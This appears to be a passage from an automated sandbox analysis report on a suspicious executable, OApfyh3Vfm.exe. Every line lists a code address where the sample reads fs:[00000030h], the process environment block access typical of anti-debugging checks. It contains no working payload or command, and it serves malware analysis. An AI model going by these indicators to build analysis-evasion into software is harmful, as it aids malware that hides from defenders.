            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_0125F0BF mov eax, dword ptr fs:[00000030h]2_2_0125F0BF
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_0125F0BF mov eax, dword ptr fs:[00000030h]2_2_0125F0BF
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_01229080 mov eax, dword ptr fs:[00000030h]2_2_01229080
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_012A3884 mov eax, dword ptr fs:[00000030h]2_2_012A3884
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_012A3884 mov eax, dword ptr fs:[00000030h]2_2_012A3884
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_012258EC mov eax, dword ptr fs:[00000030h]2_2_012258EC
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_012BB8D0 mov eax, dword ptr fs:[00000030h]2_2_012BB8D0
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_012BB8D0 mov ecx, dword ptr fs:[00000030h]2_2_012BB8D0
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_012BB8D0 mov eax, dword ptr fs:[00000030h]2_2_012BB8D0
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_012BB8D0 mov eax, dword ptr fs:[00000030h]2_2_012BB8D0
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_012BB8D0 mov eax, dword ptr fs:[00000030h]2_2_012BB8D0
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_012BB8D0 mov eax, dword ptr fs:[00000030h]2_2_012BB8D0
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_012E131B mov eax, dword ptr fs:[00000030h]2_2_012E131B
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_0122DB60 mov ecx, dword ptr fs:[00000030h]2_2_0122DB60
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_01253B7A mov eax, dword ptr fs:[00000030h]2_2_01253B7A
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_01253B7A mov eax, dword ptr fs:[00000030h]2_2_01253B7A
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_0122DB40 mov eax, dword ptr fs:[00000030h]2_2_0122DB40
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_012F8B58 mov eax, dword ptr fs:[00000030h]2_2_012F8B58
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_0122F358 mov eax, dword ptr fs:[00000030h]2_2_0122F358
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_01254BAD mov eax, dword ptr fs:[00000030h]2_2_01254BAD
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_01254BAD mov eax, dword ptr fs:[00000030h]2_2_01254BAD
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_01254BAD mov eax, dword ptr fs:[00000030h]2_2_01254BAD
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_012F5BA5 mov eax, dword ptr fs:[00000030h]2_2_012F5BA5
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_012E138A mov eax, dword ptr fs:[00000030h]2_2_012E138A
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_01231B8F mov eax, dword ptr fs:[00000030h]2_2_01231B8F
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_01231B8F mov eax, dword ptr fs:[00000030h]2_2_01231B8F
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_012DD380 mov ecx, dword ptr fs:[00000030h]2_2_012DD380
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_01252397 mov eax, dword ptr fs:[00000030h]2_2_01252397
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_0125B390 mov eax, dword ptr fs:[00000030h]2_2_0125B390
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_012503E2 mov eax, dword ptr fs:[00000030h]2_2_012503E2
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_012503E2 mov eax, dword ptr fs:[00000030h]2_2_012503E2
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_012503E2 mov eax, dword ptr fs:[00000030h]2_2_012503E2
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_012503E2 mov eax, dword ptr fs:[00000030h]2_2_012503E2
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_012503E2 mov eax, dword ptr fs:[00000030h]2_2_012503E2
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_012503E2 mov eax, dword ptr fs:[00000030h]2_2_012503E2
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_0124DBE9 mov eax, dword ptr fs:[00000030h]2_2_0124DBE9
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_012A53CA mov eax, dword ptr fs:[00000030h]2_2_012A53CA
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_012A53CA mov eax, dword ptr fs:[00000030h]2_2_012A53CA
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_01264A2C mov eax, dword ptr fs:[00000030h]2_2_01264A2C
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_01264A2C mov eax, dword ptr fs:[00000030h]2_2_01264A2C
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_01238A0A mov eax, dword ptr fs:[00000030h]2_2_01238A0A
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_01225210 mov eax, dword ptr fs:[00000030h]2_2_01225210
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_01225210 mov ecx, dword ptr fs:[00000030h]2_2_01225210
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_01225210 mov eax, dword ptr fs:[00000030h]2_2_01225210
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_01225210 mov eax, dword ptr fs:[00000030h]2_2_01225210
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_0122AA16 mov eax, dword ptr fs:[00000030h]2_2_0122AA16
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_0122AA16 mov eax, dword ptr fs:[00000030h]2_2_0122AA16
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_01243A1C mov eax, dword ptr fs:[00000030h]2_2_01243A1C
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_012EAA16 mov eax, dword ptr fs:[00000030h]2_2_012EAA16
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_012EAA16 mov eax, dword ptr fs:[00000030h]2_2_012EAA16
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_012DB260 mov eax, dword ptr fs:[00000030h]2_2_012DB260
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_012DB260 mov eax, dword ptr fs:[00000030h]2_2_012DB260
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_012F8A62 mov eax, dword ptr fs:[00000030h]2_2_012F8A62
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_0126927A mov eax, dword ptr fs:[00000030h]2_2_0126927A
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_01229240 mov eax, dword ptr fs:[00000030h]2_2_01229240
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_01229240 mov eax, dword ptr fs:[00000030h]2_2_01229240
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_01229240 mov eax, dword ptr fs:[00000030h]2_2_01229240
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_01229240 mov eax, dword ptr fs:[00000030h]2_2_01229240
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_012EEA55 mov eax, dword ptr fs:[00000030h]2_2_012EEA55
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_012B4257 mov eax, dword ptr fs:[00000030h]2_2_012B4257
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_012252A5 mov eax, dword ptr fs:[00000030h]2_2_012252A5
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_012252A5 mov eax, dword ptr fs:[00000030h]2_2_012252A5
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_012252A5 mov eax, dword ptr fs:[00000030h]2_2_012252A5
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_012252A5 mov eax, dword ptr fs:[00000030h]2_2_012252A5
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_012252A5 mov eax, dword ptr fs:[00000030h]2_2_012252A5
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_0123AAB0 mov eax, dword ptr fs:[00000030h]2_2_0123AAB0
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_0123AAB0 mov eax, dword ptr fs:[00000030h]2_2_0123AAB0
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_0125FAB0 mov eax, dword ptr fs:[00000030h]2_2_0125FAB0
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_0125D294 mov eax, dword ptr fs:[00000030h]2_2_0125D294
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_0125D294 mov eax, dword ptr fs:[00000030h]2_2_0125D294
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_01252AE4 mov eax, dword ptr fs:[00000030h]2_2_01252AE4
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_01252ACB mov eax, dword ptr fs:[00000030h]2_2_01252ACB
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_0122AD30 mov eax, dword ptr fs:[00000030h]2_2_0122AD30
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_01233D34 mov eax, dword ptr fs:[00000030h]2_2_01233D34
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_01233D34 mov eax, dword ptr fs:[00000030h]2_2_01233D34
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_01233D34 mov eax, dword ptr fs:[00000030h]2_2_01233D34
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_01233D34 mov eax, dword ptr fs:[00000030h]2_2_01233D34
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_01233D34 mov eax, dword ptr fs:[00000030h]2_2_01233D34
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_01233D34 mov eax, dword ptr fs:[00000030h]2_2_01233D34
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_01233D34 mov eax, dword ptr fs:[00000030h]2_2_01233D34
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_01233D34 mov eax, dword ptr fs:[00000030h]2_2_01233D34
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_01233D34 mov eax, dword ptr fs:[00000030h]2_2_01233D34
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_01233D34 mov eax, dword ptr fs:[00000030h]2_2_01233D34
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_01233D34 mov eax, dword ptr fs:[00000030h]2_2_01233D34
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_01233D34 mov eax, dword ptr fs:[00000030h]2_2_01233D34
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_01233D34 mov eax, dword ptr fs:[00000030h]2_2_01233D34
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_012EE539 mov eax, dword ptr fs:[00000030h]2_2_012EE539
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_012F8D34 mov eax, dword ptr fs:[00000030h]2_2_012F8D34
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_012AA537 mov eax, dword ptr fs:[00000030h]2_2_012AA537
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_01254D3B mov eax, dword ptr fs:[00000030h]2_2_01254D3B
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_01254D3B mov eax, dword ptr fs:[00000030h]2_2_01254D3B
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_01254D3B mov eax, dword ptr fs:[00000030h]2_2_01254D3B
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_0124C577 mov eax, dword ptr fs:[00000030h]2_2_0124C577
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_0124C577 mov eax, dword ptr fs:[00000030h]2_2_0124C577
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_01263D43 mov eax, dword ptr fs:[00000030h]2_2_01263D43
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_012A3540 mov eax, dword ptr fs:[00000030h]2_2_012A3540
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_01247D50 mov eax, dword ptr fs:[00000030h]2_2_01247D50
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_012F05AC mov eax, dword ptr fs:[00000030h]2_2_012F05AC
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_012F05AC mov eax, dword ptr fs:[00000030h]2_2_012F05AC
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_012535A1 mov eax, dword ptr fs:[00000030h]2_2_012535A1
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_01251DB5 mov eax, dword ptr fs:[00000030h]2_2_01251DB5
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_01251DB5 mov eax, dword ptr fs:[00000030h]2_2_01251DB5
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_01251DB5 mov eax, dword ptr fs:[00000030h]2_2_01251DB5
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_01252581 mov eax, dword ptr fs:[00000030h]2_2_01252581
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_01252581 mov eax, dword ptr fs:[00000030h]2_2_01252581
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_01252581 mov eax, dword ptr fs:[00000030h]2_2_01252581
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_01252581 mov eax, dword ptr fs:[00000030h]2_2_01252581
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_01222D8A mov eax, dword ptr fs:[00000030h]2_2_01222D8A
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_01222D8A mov eax, dword ptr fs:[00000030h]2_2_01222D8A
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_01222D8A mov eax, dword ptr fs:[00000030h]2_2_01222D8A
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_01222D8A mov eax, dword ptr fs:[00000030h]2_2_01222D8A
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_01222D8A mov eax, dword ptr fs:[00000030h]2_2_01222D8A
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_0125FD9B mov eax, dword ptr fs:[00000030h]2_2_0125FD9B
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_0125FD9B mov eax, dword ptr fs:[00000030h]2_2_0125FD9B
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_0123D5E0 mov eax, dword ptr fs:[00000030h]2_2_0123D5E0
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_0123D5E0 mov eax, dword ptr fs:[00000030h]2_2_0123D5E0
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_012EFDE2 mov eax, dword ptr fs:[00000030h]2_2_012EFDE2
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_012EFDE2 mov eax, dword ptr fs:[00000030h]2_2_012EFDE2
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_012EFDE2 mov eax, dword ptr fs:[00000030h]2_2_012EFDE2
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_012EFDE2 mov eax, dword ptr fs:[00000030h]2_2_012EFDE2
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_012D8DF1 mov eax, dword ptr fs:[00000030h]2_2_012D8DF1
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_012A6DC9 mov eax, dword ptr fs:[00000030h]2_2_012A6DC9
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_012A6DC9 mov eax, dword ptr fs:[00000030h]2_2_012A6DC9
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_012A6DC9 mov eax, dword ptr fs:[00000030h]2_2_012A6DC9
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_012A6DC9 mov ecx, dword ptr fs:[00000030h]2_2_012A6DC9
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_012A6DC9 mov eax, dword ptr fs:[00000030h]2_2_012A6DC9
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_012A6DC9 mov eax, dword ptr fs:[00000030h]2_2_012A6DC9
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_0125BC2C mov eax, dword ptr fs:[00000030h]2_2_0125BC2C
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_012A6C0A mov eax, dword ptr fs:[00000030h]2_2_012A6C0A
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_012A6C0A mov eax, dword ptr fs:[00000030h]2_2_012A6C0A
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_012A6C0A mov eax, dword ptr fs:[00000030h]2_2_012A6C0A
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_012A6C0A mov eax, dword ptr fs:[00000030h]2_2_012A6C0A
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_012F740D mov eax, dword ptr fs:[00000030h]2_2_012F740D
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_012F740D mov eax, dword ptr fs:[00000030h]2_2_012F740D
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_012F740D mov eax, dword ptr fs:[00000030h]2_2_012F740D
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_012E1C06 mov eax, dword ptr fs:[00000030h]2_2_012E1C06
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_012E1C06 mov eax, dword ptr fs:[00000030h]2_2_012E1C06
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_012E1C06 mov eax, dword ptr fs:[00000030h]2_2_012E1C06
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_012E1C06 mov eax, dword ptr fs:[00000030h]2_2_012E1C06
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_012E1C06 mov eax, dword ptr fs:[00000030h]2_2_012E1C06
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_012E1C06 mov eax, dword ptr fs:[00000030h]2_2_012E1C06
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_012E1C06 mov eax, dword ptr fs:[00000030h]2_2_012E1C06
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_012E1C06 mov eax, dword ptr fs:[00000030h]2_2_012E1C06
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_012E1C06 mov eax, dword ptr fs:[00000030h]2_2_012E1C06
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_012E1C06 mov eax, dword ptr fs:[00000030h]2_2_012E1C06
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_012E1C06 mov eax, dword ptr fs:[00000030h]2_2_012E1C06
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_012E1C06 mov eax, dword ptr fs:[00000030h]2_2_012E1C06
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_012E1C06 mov eax, dword ptr fs:[00000030h]2_2_012E1C06
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_012E1C06 mov eax, dword ptr fs:[00000030h]2_2_012E1C06
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_0124746D mov eax, dword ptr fs:[00000030h]2_2_0124746D
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_0125A44B mov eax, dword ptr fs:[00000030h]2_2_0125A44B
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_012BC450 mov eax, dword ptr fs:[00000030h]2_2_012BC450
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_012BC450 mov eax, dword ptr fs:[00000030h]2_2_012BC450
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_0123849B mov eax, dword ptr fs:[00000030h]2_2_0123849B
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_012E14FB mov eax, dword ptr fs:[00000030h]2_2_012E14FB
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_012A6CF0 mov eax, dword ptr fs:[00000030h]2_2_012A6CF0
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_012A6CF0 mov eax, dword ptr fs:[00000030h]2_2_012A6CF0
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_012A6CF0 mov eax, dword ptr fs:[00000030h]2_2_012A6CF0
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_012F8CD6 mov eax, dword ptr fs:[00000030h]2_2_012F8CD6
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_01224F2E mov eax, dword ptr fs:[00000030h]2_2_01224F2E
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_01224F2E mov eax, dword ptr fs:[00000030h]2_2_01224F2E
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_0125E730 mov eax, dword ptr fs:[00000030h]2_2_0125E730
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_012F070D mov eax, dword ptr fs:[00000030h]2_2_012F070D
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_012F070D mov eax, dword ptr fs:[00000030h]2_2_012F070D
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_0125A70E mov eax, dword ptr fs:[00000030h]2_2_0125A70E
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_0125A70E mov eax, dword ptr fs:[00000030h]2_2_0125A70E
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_0124F716 mov eax, dword ptr fs:[00000030h]2_2_0124F716
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_012BFF10 mov eax, dword ptr fs:[00000030h]2_2_012BFF10
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_012BFF10 mov eax, dword ptr fs:[00000030h]2_2_012BFF10
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_0123FF60 mov eax, dword ptr fs:[00000030h]2_2_0123FF60
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_012F8F6A mov eax, dword ptr fs:[00000030h]2_2_012F8F6A
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_0123EF40 mov eax, dword ptr fs:[00000030h]2_2_0123EF40
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_01238794 mov eax, dword ptr fs:[00000030h]2_2_01238794
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_012A7794 mov eax, dword ptr fs:[00000030h]2_2_012A7794
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_012A7794 mov eax, dword ptr fs:[00000030h]2_2_012A7794
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_012A7794 mov eax, dword ptr fs:[00000030h]2_2_012A7794
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_012637F5 mov eax, dword ptr fs:[00000030h]2_2_012637F5
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_0122E620 mov eax, dword ptr fs:[00000030h]2_2_0122E620
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_012DFE3F mov eax, dword ptr fs:[00000030h]2_2_012DFE3F
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_0122C600 mov eax, dword ptr fs:[00000030h]2_2_0122C600
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_0122C600 mov eax, dword ptr fs:[00000030h]2_2_0122C600
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_0122C600 mov eax, dword ptr fs:[00000030h]2_2_0122C600
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_01258E00 mov eax, dword ptr fs:[00000030h]2_2_01258E00
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_012E1608 mov eax, dword ptr fs:[00000030h]2_2_012E1608
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_0125A61C mov eax, dword ptr fs:[00000030h]2_2_0125A61C
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_0125A61C mov eax, dword ptr fs:[00000030h]2_2_0125A61C
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_0123766D mov eax, dword ptr fs:[00000030h]2_2_0123766D
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_0124AE73 mov eax, dword ptr fs:[00000030h]2_2_0124AE73
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_0124AE73 mov eax, dword ptr fs:[00000030h]2_2_0124AE73
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_0124AE73 mov eax, dword ptr fs:[00000030h]2_2_0124AE73
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_0124AE73 mov eax, dword ptr fs:[00000030h]2_2_0124AE73
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_0124AE73 mov eax, dword ptr fs:[00000030h]2_2_0124AE73
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_01237E41 mov eax, dword ptr fs:[00000030h]2_2_01237E41
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_01237E41 mov eax, dword ptr fs:[00000030h]2_2_01237E41
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_01237E41 mov eax, dword ptr fs:[00000030h]2_2_01237E41
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_01237E41 mov eax, dword ptr fs:[00000030h]2_2_01237E41
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_01237E41 mov eax, dword ptr fs:[00000030h]2_2_01237E41
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_01237E41 mov eax, dword ptr fs:[00000030h]2_2_01237E41
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_012EAE44 mov eax, dword ptr fs:[00000030h]2_2_012EAE44
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_012EAE44 mov eax, dword ptr fs:[00000030h]2_2_012EAE44
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_012F0EA5 mov eax, dword ptr fs:[00000030h]2_2_012F0EA5
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_012F0EA5 mov eax, dword ptr fs:[00000030h]2_2_012F0EA5
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_012F0EA5 mov eax, dword ptr fs:[00000030h]2_2_012F0EA5
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_012A46A7 mov eax, dword ptr fs:[00000030h]2_2_012A46A7
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_012BFE87 mov eax, dword ptr fs:[00000030h]2_2_012BFE87
